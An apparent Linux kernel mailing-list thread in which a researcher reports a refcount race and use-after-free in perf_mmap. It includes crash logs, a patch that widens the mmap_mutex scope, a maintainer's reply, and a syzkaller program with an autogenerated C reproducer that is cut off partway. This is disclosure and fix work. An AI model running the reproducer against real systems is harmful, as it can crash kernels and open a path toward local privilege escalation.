0x13 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul, /*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul, /*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1], /*offset=*/0ul); return 0; }
On Mon, Feb 02, 2026 at 03:44:35PM +0800, Haocheng Yu wrote:

So you're saying this is something like:

	Thread-1		Thread-2

	mmap(fd)		close(fd) / ioctl(fd, IOC_SET_OUTPUT)

I don't think close() is possible, because mmap() should have a
reference on the struct file from fget(), no?

That leaves the ioctl(), let me go have a peek.
{ "author": "Peter Zijlstra <peterz@infradead.org>", "date": "Mon, 2 Feb 2026 14:58:59 +0100", "thread_id": "20260202162057.7237-1-yuhaocheng035@gmail.com.mbox.gz" }
lkml
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
Hello, I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzing tool that I developed. Summary ------- A local user can trigger a reference count saturation or a use-after-free (UAF) vulnerability in the perf_mmap function. This is caused by a race condition where a ring_buffer object's reference count is incremented after it has already reached zero. The vulnerability exists in the perf_mmap() function in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range) on event->rb outside of the locked scope. If the event is closed or the buffer is detached concurrently, the reference count of the ring_buffer can drop to zero, leading to an 'addition on 0' warning or a UAF when the kernel attempts to access or increment it later. I verified this on Linux kernel version 6.18.5. Environment ----------- - Kernel version: 6.18.5 (the complete config is attached) - Architecture: x86_64 - Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1) Symptoms and logs ----------------- The kernel triggers a 'refcount_t: addition on 0; use-after-free' warning followed by a memory leak warning The full report is as below: audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1 ------------[ cut here ]------------ refcount_t: addition on 0; use-after-free. 
WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff888103c17678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c
RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88
RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2
R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000
R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170
FS:  00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0
DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2
DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600
PKRU: 80000000
Call Trace:
 <TASK>
 __refcount_add include/linux/refcount.h:289 [inline]
 __refcount_inc include/linux/refcount.h:366 [inline]
 refcount_inc include/linux/refcount.h:383 [inline]
 perf_mmap_rb kernel/events/core.c:7005 [inline]
 perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
 vfs_mmap include/linux/fs.h:2405 [inline]
 mmap_file mm/internal.h:167 [inline]
 __mmap_new_file_vma mm/vma.c:2413 [inline]
 __mmap_new_vma mm/vma.c:2476 [inline]
 __mmap_region+0xea5/0x2250 mm/vma.c:2670
 mmap_region+0x267/0x350 mm/vma.c:2740
 do_mmap+0x769/0xe50 mm/mmap.c:558
 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
 __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
 __x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
 do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
 entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f7ef5cabb9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d
RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000
RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640
 </TASK>
---[ end trace 0000000000000000 ]---
EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
EXT4-fs (loop0): Total free blocks count 0
EXT4-fs (loop0): Free/Dirty block details
EXT4-fs (loop0): free_blocks=12386304
EXT4-fs (loop0): dirty_blocks=16387
EXT4-fs (loop0): Block reservation details
EXT4-fs (loop0): i_reserved_data_blocks=16387
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
SYZFAIL: failed to recv rpc fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor)
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>

Reproduce
----------

The issue is reproducible using the C reproducer attached.
The reproducer triggers the vulnerability by creating a high-frequency
race condition between memory mapping and event teardown. The
reproducer follows this execution flow:

1. Event Creation: It initializes a performance monitoring event via
   perf_event_open(), typically with inherit or specific sample_type
   flags that necessitate the allocation of a kernel ring_buffer.

2. Multithreaded Hammering: The program spawns multiple threads or
   forks child processes to perform concurrent operations on the same
   file descriptor.

3. The Race: Thread A continuously calls mmap() on the perf file
   descriptor. This enters the kernel-side perf_mmap() function, which
   briefly acquires the mmap_mutex to set up the buffer but then drops
   it. Meanwhile, Thread B (or the main loop) attempts to close the
   descriptor or modify the event state, which can trigger the
   destruction or detachment of the ring_buffer.

4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to
   perform map_range() after the mmap_mutex has been released, Thread B
   can drop the buffer's reference count to zero during this
   unprotected window.

5. Crash/Warning: When Thread A finally reaches the code that
   increments the reference count or accesses the buffer (e.g., in
   perf_mmap_rb or map_range), the refcount_t infrastructure detects an
   "addition on 0", resulting in the KASAN or refcount_warn_saturate
   report.

Security impact
---------------

The vulnerability allows a local user to compromise system integrity by
triggering a reference count saturation or a use-after-free (UAF)
condition. While the immediate symptom is typically a kernel warning or
a denial of service through a system hang or panic, especially in
environments with panic_on_warn enabled, the underlying memory
corruption represents a more significant threat. By causing a
ring_buffer object to be accessed after its reference count has reached
zero, an attacker may be able to leverage this UAF state to perform
heap grooming.
If the freed memory is reallocated with a controlled structure, it
could potentially be exploited to achieve local privilege escalation,
making this a critical issue for multi-user systems or containerized
environments where the perf_event interface is accessible.

Patch
--------------

From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001
From: 0ne1r0s <yuhaocheng035@gmail.com>
Date: Sat, 31 Jan 2026 21:16:52 +0800
Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap

The issue is caused by a race condition between mmap() and event
teardown. In perf_mmap(), the ring_buffer (rb) is accessed via
map_range() after the mmap_mutex is released. If another thread closes
the event or detaches the buffer during this window, the reference
count of rb can drop to zero, leading to a UAF or refcount saturation
when map_range() or subsequent logic attempts to use it.

Fix this by extending the scope of mmap_mutex to cover the entire setup
process, including map_range(), ensuring the buffer remains valid until
the mapping is complete.

Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com>
---
 kernel/events/core.c | 42 +++++++++++++++++++++---------------------
 1 file changed, 21 insertions(+), 21 deletions(-)

diff --git a/kernel/events/core.c b/kernel/events/core.c
index 2c35acc2722b..7c93f7d057cb 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
 		ret = perf_mmap_aux(vma, event, nr_pages);
 		if (ret)
 			return ret;
-	}
-
-	/*
-	 * Since pinned accounting is per vm we cannot allow fork() to copy our
-	 * vma.
-	 */
-	vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
-	vma->vm_ops = &perf_mmap_vmops;
-	mapped = get_mapped(event, event_mapped);
-	if (mapped)
-		mapped(event, vma->vm_mm);
-
-	/*
-	 * Try to map it into the page table. On fail, invoke
-	 * perf_mmap_close() to undo the above, as the callsite expects
-	 * full cleanup in this case and therefore does not invoke
-	 * vmops::close().
-	 */
-	ret = map_range(event->rb, vma);
-	if (ret)
-		perf_mmap_close(vma);
+		/*
+		 * Since pinned accounting is per vm we cannot allow fork() to copy our
+		 * vma.
+		 */
+		vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
+		vma->vm_ops = &perf_mmap_vmops;
+
+		mapped = get_mapped(event, event_mapped);
+		if (mapped)
+			mapped(event, vma->vm_mm);
+
+		/*
+		 * Try to map it into the page table. On fail, invoke
+		 * perf_mmap_close() to undo the above, as the callsite expects
+		 * full cleanup in this case and therefore does not invoke
+		 * vmops::close().
+		 */
+		ret = map_range(event->rb, vma);
+		if (ret)
+			perf_mmap_close(vma);
+	}

 	return ret;
 }
-- 
2.51.0

Request
-------

Could you please review this issue and the proposed fix? If this is a
confirmed new vulnerability, I would appreciate coordination on a CVE
ID.

Best regards,
Haocheng Yu
Zhejiang University

Syzkaller hit 'WARNING: refcount bug in perf_mmap' bug.

audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Modules linked in: CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f RSP: 0018:ffff8881036bf678 EFLAGS: 00010286 RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000 RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000 R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0 FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0 PKRU: 55555554 Call Trace: <TASK> __refcount_add include/linux/refcount.h:289 [inline] __refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] perf_mmap_rb kernel/events/core.c:7005 [inline] perf_mmap+0x126d/0x1990 kernel/events/core.c:7163 vfs_mmap include/linux/fs.h:2405 [inline] mmap_file mm/internal.h:167 [inline] __mmap_new_file_vma mm/vma.c:2413 [inline] __mmap_new_vma mm/vma.c:2476 [inline] __mmap_region+0xea5/0x2250 mm/vma.c:2670 mmap_region+0x267/0x350 mm/vma.c:2740 do_mmap+0x769/0xe50 mm/mmap.c:558 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline] __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline] __x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xac/0x2a0 
arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f4a5add3b9d Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000 RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000 R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000 R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0 </TASK> ---[ end trace 0000000000000000 ]--- Syzkaller reproducer: # {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}} pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff) r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8) mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0) r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 
0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2) mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0) C reproducer: // autogenerated by syzkaller (https://github.com/google/syzkaller) #define _GNU_SOURCE #include <endian.h> #include <setjmp.h> #include <signal.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/syscall.h> #include <sys/types.h> #include <unistd.h> #ifndef __NR_pkey_mprotect #define __NR_pkey_mprotect 329 #endif static __thread int clone_ongoing; static __thread int skip_segv; static __thread jmp_buf segv_env; static void segv_handler(int sig, siginfo_t* info, void* ctx) { if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) { exit(sig); } uintptr_t addr = (uintptr_t)info->si_addr; const uintptr_t prog_start = 1 << 20; const uintptr_t prog_end = 100 << 20; int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0; int valid = addr < prog_start || addr > prog_end; if (skip && valid) { _longjmp(segv_env, 1); } exit(sig); } static void install_segv_handler(void) { struct sigaction sa; memset(&sa, 0, sizeof(sa)); sa.sa_handler = SIG_IGN; syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8); syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8); memset(&sa, 0, sizeof(sa)); sa.sa_sigaction = segv_handler; sa.sa_flags = SA_NODEFER | SA_SIGINFO; sigaction(SIGSEGV, &sa, NULL); sigaction(SIGBUS, &sa, NULL); } #define NONFAILING(...) 
\ ({ \ int ok = 1; \ __atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \ if (_setjmp(segv_env) == 0) { \ __VA_ARGS__; \ } else \ ok = 0; \ __atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \ ok; \ }) #define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off)) #define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \ *(type*)(addr) = \ htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \ (((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len)))) uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff}; int main(void) { syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul, /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); const char* reason; (void)reason; install_segv_handler(); intptr_t res = 0; if (write(1, "executing program\n", sizeof("executing program\n") - 1)) { } // pkey_mprotect arguments: [ // addr: VMA[0x2000] // len: len = 0x2000 (8 bytes) // prot: mmap_prot = 0x5 (8 bytes) // key: pkey (resource) // ] syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul, /*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 
bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 = 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // 
__reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x8 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); 
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); 
NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/(intptr_t)-1, /*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul); if (res != -1) r[0] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x0 (8 bytes) // flags: mmap_flags = 0x11 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // 